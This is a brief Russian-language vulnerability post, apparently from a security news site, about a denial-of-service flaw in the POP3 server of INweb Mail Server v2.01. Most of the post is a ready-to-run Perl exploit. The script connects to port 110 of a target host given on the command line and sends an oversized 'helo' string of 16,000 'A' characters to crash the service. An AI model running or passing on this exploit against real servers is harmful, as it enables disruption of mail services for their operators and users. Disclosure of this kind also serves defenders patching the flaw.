INweb Mail Server - POP3 и SMTP почтовый сервер для Windows платформ.
POP3 server, включенный в INweb Mail Server, не в состоянии обработать некоторые типы запросов. Представляя специально обработанный запрос к POP3 серверу, удаленный атакующий может разрушить систему. Эксплоит: 

#!/usr/bin/perl -w 
use IO::Socket; 
$host = $ARGV[0]; 
$port = "110"; 
$evil = "A" x 16000; 
print "INweb Mail Server v2.01 Denial of Service Vulnerability by SecurityOffice\n"; 
print "Usage: $0 host\n"; 
print "Connecting...\n"; 
$socket = IO::Socket::INET-> 
new(Proto=>"tcp", 
PeerAddr=>$host, 
PeerPort=>$port) 
|| die "Connection failed.\n"; 
print "Attacking...\n"; 
print $socket "helo:$evil\n\n"; 
close($socket); 
print "\nConnection closed. Finished.\n\n"; 

Уязвимость обнаружена в INweb Mail Server v2.01.

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии